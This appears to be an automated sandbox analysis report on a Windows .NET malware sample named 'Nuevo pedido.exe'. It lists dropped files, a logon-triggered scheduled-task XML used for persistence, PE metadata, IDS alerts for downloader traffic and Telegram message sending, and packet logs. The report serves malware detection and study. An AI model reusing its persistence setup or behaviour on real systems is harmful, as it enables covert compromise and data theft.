Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwjuacuo.3hg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz5oc35j.sfw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycwutfrw.5tb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm4ctvok.ils.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp56AD.tmp

Download File

Process:	C:\Users\user\Desktop\Nuevo pedido.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.119637812203657
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaGxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTrv
MD5:	BB513AD68C6B17C817993758D14270AB
SHA1:	444DE24DEC11832AB5DA33A4DEB8B30BDC3C4BCD
SHA-256:	0C1CDD3F2AF5C797154C7AC15A21FBCAE77CB60E772EA46334459460742AF230
SHA-512:	86757EE1C88FF4AC1680A8D3282620F4DED396702279847F2466AA891EF54DFA332FCCC169772845A72F5FEEF635EDF3CD1083B12C18099012B7EEF5C4EE9D55
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp69D7.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.119637812203657
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaGxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTrv
MD5:	BB513AD68C6B17C817993758D14270AB
SHA1:	444DE24DEC11832AB5DA33A4DEB8B30BDC3C4BCD
SHA-256:	0C1CDD3F2AF5C797154C7AC15A21FBCAE77CB60E772EA46334459460742AF230
SHA-512:	86757EE1C88FF4AC1680A8D3282620F4DED396702279847F2466AA891EF54DFA332FCCC169772845A72F5FEEF635EDF3CD1083B12C18099012B7EEF5C4EE9D55
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Download File

Process:	C:\Users\user\Desktop\Nuevo pedido.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	754176
Entropy (8bit):	7.936284236243805
Encrypted:	false
SSDEEP:	12288:zNYVYJdaCiBTiid+myis0hDE+iubk5NG4MXpnHXgYfzDDGl+9dVazSxC9C:i+FeTiid/xs8BiukN3MXpQKzDDGlnAR
MD5:	B19A7098F74CE79004FFD6A109302EF0
SHA1:	206FF16596FC022D321DF2687440C7942A3C2D4C
SHA-256:	1AD584B71B2EBB4FE6418E55F8D261BA662D4AB07E68FF05C1A073580E2419E2
SHA-512:	913EE9F0949A89B1A62CF93D21FDFBD3127165A2EF6DC6DAD5D098C3D772F3AB4F844523A103EF16AEEDCB069F3FC154DA7A355A8FC0B2F611978A50EB00A3D7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7~g..............0..d............... ........@.. ....................................@.................................X...O...................................._..T............................................ ............... ..H............text....b... ...d.................. ..`.rsrc................f..............@..@.reloc..............................@..B........................H........H..............\...xM..........................................^..}.....(.......(......0..V........s...... =...}......{....o....}......{....o....}.....r...p}......{....o....}......+.....0..+.........,..{.......+....,...{....o........(.....*..0............s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....(......{.....o .....{........s!...o".....{....r...po#.....{.....:..s$...o%.....{.....o&.....{....r...po'.....{.....o .....{.......;s!...o

C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Nuevo pedido.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.936284236243805
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Nuevo pedido.exe
File size:	754'176 bytes
MD5:	b19a7098f74ce79004ffd6a109302ef0
SHA1:	206ff16596fc022d321df2687440c7942a3c2d4c
SHA256:	1ad584b71b2ebb4fe6418e55f8d261ba662d4ab07e68ff05c1a073580e2419e2
SHA512:	913ee9f0949a89b1a62cf93d21fdfbd3127165a2ef6dc6dad5d098c3d772f3ab4f844523a103ef16aeedcb069f3fc154da7a355a8fc0b2f611978a50eb00a3d7
SSDEEP:	12288:zNYVYJdaCiBTiid+myis0hDE+iubk5NG4MXpnHXgYfzDDGl+9dVazSxC9C:i+FeTiid/xs8BiukN3MXpQKzDDGlnAR
TLSH:	C7F412045BE98E99C8A80B3525500A508374FE9984D3E34B769A117F1FE331BDAD2BF7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7~g..............0..d............... ........@.. ....................................@................................

File Icon


Icon Hash:	26b6dac84c6c3e03

Static PE Info

General

Entrypoint:	0x4b82aa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677E37E1 [Wed Jan 8 08:31:29 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
adc dh, byte ptr [esi+edx*2]
js 00007FA2392504F2h
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb8258	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x18b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb5fd4	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb62c8	0xb6400	ff021da3fee323c30f3b325c46bc825f	False	0.9455013824588477	PGP symmetric key encrypted data - Plaintext or unencrypted data	7.94951474543567	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x18b8	0x1a00	323e633e6c9f9934399f793715d14875	False	0.4612379807692308	data	4.853910115570166	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0xc	0x200	46b36ce5ee8df8a1bdec21cf0456ca12	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xba130	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4939236111111111
RT_GROUP_ICON	0xbb330	0x14	data	1.0
RT_VERSION	0xbb344	0x388	data	0.4192477876106195
RT_MANIFEST	0xbb6cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T16:36:01.743141+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-09T16:36:04.123149+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-09T16:36:04.683812+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	104.21.16.1	443	TCP
2025-01-09T16:36:05.326675+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.130.0	80	TCP
2025-01-09T16:36:06.336230+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-09T16:36:06.461247+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	193.122.130.0	80	TCP
2025-01-09T16:36:07.010759+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49743	104.21.16.1	443	TCP
2025-01-09T16:36:07.367481+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-09T16:36:08.151633+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	104.21.16.1	443	TCP
2025-01-09T16:36:08.679997+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49747	193.122.130.0	80	TCP
2025-01-09T16:36:10.374485+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49753	104.21.16.1	443	TCP
2025-01-09T16:36:11.612850+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49758	104.21.16.1	443	TCP
2025-01-09T16:36:11.674470+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49757	104.21.16.1	443	TCP
2025-01-09T16:36:13.730642+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49763	149.154.167.220	443	TCP
2025-01-09T16:36:13.987092+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49766	104.21.16.1	443	TCP
2025-01-09T16:36:16.703376+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49774	104.21.16.1	443	TCP
2025-01-09T16:36:17.745150+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49775	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 16:36:00.965152025 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:00.969975948 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:00.970329046 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:00.970580101 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:00.975336075 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:01.428589106 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:01.433715105 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:01.438572884 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:01.534163952 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:01.605786085 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:01.605838060 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:01.605902910 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:01.655457973 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:01.655491114 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:01.743089914 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:01.743140936 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:02.137227058 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:02.137413979 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:02.192708015 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:02.192795992 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:02.193872929 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:02.258148909 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:02.657330036 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:02.699376106 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:02.784236908 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:02.784303904 CET	443	49734	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:02.784365892 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:02.793958902 CET	49734	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:02.806159973 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:02.810936928 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:04.052448034 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:04.054749966 CET	49737	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:04.054794073 CET	443	49737	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:04.054991007 CET	49737	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:04.055346012 CET	49737	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:04.055354118 CET	443	49737	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:04.123101950 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:04.123148918 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:04.529759884 CET	443	49737	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:04.532063961 CET	49737	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:04.532094002 CET	443	49737	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:04.683875084 CET	443	49737	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:04.683976889 CET	443	49737	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:04.684878111 CET	49737	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:04.685131073 CET	49737	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:04.691178083 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:04.692569971 CET	49738	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:04.696211100 CET	80	49733	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:04.696382999 CET	49733	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:04.697348118 CET	80	49738	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:04.697417021 CET	49738	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:04.697592020 CET	49738	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:04.702320099 CET	80	49738	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:05.179434061 CET	80	49738	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:05.181202888 CET	49739	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:05.181266069 CET	443	49739	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:05.181366920 CET	49739	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:05.181834936 CET	49739	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:05.181853056 CET	443	49739	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:05.326674938 CET	49738	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.612867117 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.617832899 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:05.617903948 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.618122101 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.622941971 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:05.663263083 CET	443	49739	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:05.665673018 CET	49739	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:05.665714025 CET	443	49739	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:05.844871998 CET	443	49739	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:05.845030069 CET	443	49739	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:05.845077038 CET	49739	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:05.845416069 CET	49739	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:05.848634005 CET	49738	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.849710941 CET	49741	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.853601933 CET	80	49738	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:05.853666067 CET	49738	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.854489088 CET	80	49741	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:05.854558945 CET	49741	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.854659081 CET	49741	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:05.859428883 CET	80	49741	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:06.122505903 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:06.127437115 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:06.132303953 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:06.247389078 CET	80	49740	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:06.277751923 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.277791977 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.277868032 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.281128883 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.281141043 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.336230040 CET	49740	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:06.369398117 CET	80	49741	193.122.130.0	192.168.2.4
Jan 9, 2025 16:36:06.370387077 CET	49743	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.370441914 CET	443	49743	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.370501041 CET	49743	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.370676994 CET	49743	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.370693922 CET	443	49743	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.461246967 CET	49741	80	192.168.2.4	193.122.130.0
Jan 9, 2025 16:36:06.758915901 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.758990049 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.762306929 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.762317896 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.762592077 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.804975033 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.851747990 CET	443	49743	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.860604048 CET	49743	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.860635996 CET	443	49743	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:06.945100069 CET	49742	443	192.168.2.4	104.21.16.1
Jan 9, 2025 16:36:06.987324953 CET	443	49742	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.010777950 CET	443	49743	104.21.16.1	192.168.2.4
Jan 9, 2025 16:36:07.010843039 CET	443	49743	104.21.16.1	192.168.2.4
